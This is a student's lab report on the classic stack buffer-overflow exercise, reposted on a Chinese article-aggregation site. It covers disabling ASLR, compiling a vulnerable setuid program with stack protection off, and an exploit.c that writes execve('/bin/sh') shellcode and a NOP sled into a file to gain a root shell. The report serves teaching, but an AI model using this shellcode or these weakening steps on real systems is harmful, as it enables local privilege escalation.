码迷,mamicode.com
首页 > 其他好文 > 详细

2018-2019-1 20165228 《信息安全系统设计基础》缓冲区溢出漏洞实验报告

时间:2018-10-13 22:43:11      阅读:221      评论:0      收藏:0      [点我收藏+]

标签:lib   临时文件   over   -o   报告   信息   with   rand   初始   

2018-2019-1 20165228 《信息安全系统设计基础》缓冲区溢出漏洞实验报告

实验简介:

缓冲区溢出攻击:通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。

实验原理:

一般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址,那么程序就会跳转到该地址,如果该地址存放的是一段精心设计的代码用于实现其他功能,这段代码就是 shellcode。shellcode是存放程序的汇编代码。

实验步骤:

1、关闭地址空间随机化功能,使猜测随机堆(heap)和栈(stack)的初始地址更容易。
使用命令:

$ sudo sysctl -w kernel.randomize_va_space=0

技术分享图片

2、使用另一个 shell 程序(zsh)代替 /bin/bash,以重现防范缓冲区溢出攻击及其它利用 shell 程序的攻击防护措施被实现之前的情形。
设置zsh程序命令:

$ sudo su
$ cd /bin
$ rm sh
$ ln -s zsh sh
$ exit

3、进入linux32位环境,输入“/bin/bash”使用bash

$ linux32
$ /bin/bash

4、在 /tmp 目录下新建一个 stack.c 文件,代码如下

/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[12];

    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;//定义文件指针

    badfile = fopen("badfile", "r");//文件指针指向badfile
    fread(str, sizeof(char), 517, badfile);//从badfile中读取内容到str
    bof(str);//再把str中的内容复制到buffer中
    printf("Returned Properly\n");
    return 1;
}

技术分享图片

5、编译该程序,并设置set-uid

Linux SETUID机制
(1)进程运行时能够访问哪些资源或文件,不取决于进程文件的属主属组,而是取决于运行该命令的用户身份的uid/gid,以该身份获取各种系统资源。
(2)对一个属主为root的可执行文件,如果设置了SUID位,则其他所有普通用户都将可以以root身份运行该文件,获取相应的系统资源。
(3)可以简单地理解为让普通用户拥有可以执行“只有root权限才能执行”的特殊权限。
(4)setuid,setuid的作用是让执行该命令的用户以该命令拥有者的权限去执行,比如普通用户执行passwd时会拥有root的权限,这样就可以修改/etc/passwd这个文件了。它的标志为:s,会出现在x的地方,例:-rwsr-xr-x 。而setgid的意思和它是一样的,即让执行文件的用户以该文件所属组的权限去执行,
(5)我们知道/tmp是系统的临时文件目录,所有的用户在该目录下拥有所有的权限,也就是说在该目录下可以任意创建、修改、删除文件,那如果用户A在该目录下创建了一个文件,用户B将该文件删除了,这种情况我们是不能允许的。为了达到该目的,就出现了stick bit(粘滞位)的概念。它是针对目录来说的,如果该目录设置了stick bit(粘滞位),则该目录下的文件除了该文件的创建者和root用户可以删除和修改/tmp目录下的stuff,别的用户均不能动别人的,这就是粘滞位的作用。

-- 引用自《Linux理解setuid()、setgid()和sticky位

u 表示该档案的拥有者,g 表示与该档案的拥有者属于同一个群体(group)者,o 表示其他以外的人,a 表示这三者皆是。

  • 表示增加权限、- 表示取消权限、= 表示唯一设定权限。
    r 表示可读取,w 表示可写入,x 表示可执行,X 表示只有当该档案是个子目录或者该档案已经被设定过为可执行。
    -c : 若该档案权限确实已经更改,才显示其更改动作
    -f : 若该档案权限无法被更改也不要显示错误讯息
    -v : 显示权限变更的详细资料
    -R : 对目前目录下的所有档案与子目录进行相同的权限变更(即以递回的方式逐个变更)

-- 引用自《chmod命令详细用法

命令:

$ sudo su
$ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
//–fno-stack-protector 关闭阻止缓冲区溢出的栈保护机制, -z execstack 用于允许执行栈。
$ chmod u+s stack
$ exit

技术分享图片

6、在 /tmp 目录下新建一个 exploit.c 文件,代码如下:

/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] =
    "\x31\xc0" //xorl %eax,%eax
    "\x50"     //pushl %eax
    "\x68""//sh" //pushl $0x68732f2f
    "\x68""/bin"     //pushl $0x6e69622f
    "\x89\xe3" //movl %esp,%ebx
    "\x50"     //pushl %eax
    "\x53"     //pushl %ebx
    "\x89\xe1" //movl %esp,%ecx
    "\x99"     //cdq
    "\xb0\x0b" //movb $0x0b,%al
    "\xcd\x80" //int $0x80
    ;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");   //在buffer特定偏移处起始的四个字节覆盖sellcode地址  
    strcpy(buffer + 100, shellcode);   //将shellcode拷贝至buffer,偏移量设为了 100

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

命令:

cd /tmp
vi exploit.c

7、输入命令得到 shellcode 在内存中的地址,设置断点,然后得到str地址。

$ gdb stack
$ disass main

技术分享图片

技术分享图片

8、修改exploit.c文件,shellcode 的地址为 0xffffd060(十六进制) + 0x64(100的十六进制) = 0xffffd0c4(十六进制)
9、编译 exploit.c 程序:

$ gcc -m32 -o exploit exploit.c

10、先运行攻击程序 exploit,再运行漏洞程序 stack,观察结果:

技术分享图片

通过攻击,获得了root 权限!

2018-2019-1 20165228 《信息安全系统设计基础》缓冲区溢出漏洞实验报告

标签:lib   临时文件   over   -o   报告   信息   with   rand   初始   

原文地址:https://www.cnblogs.com/cloud795/p/9784170.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!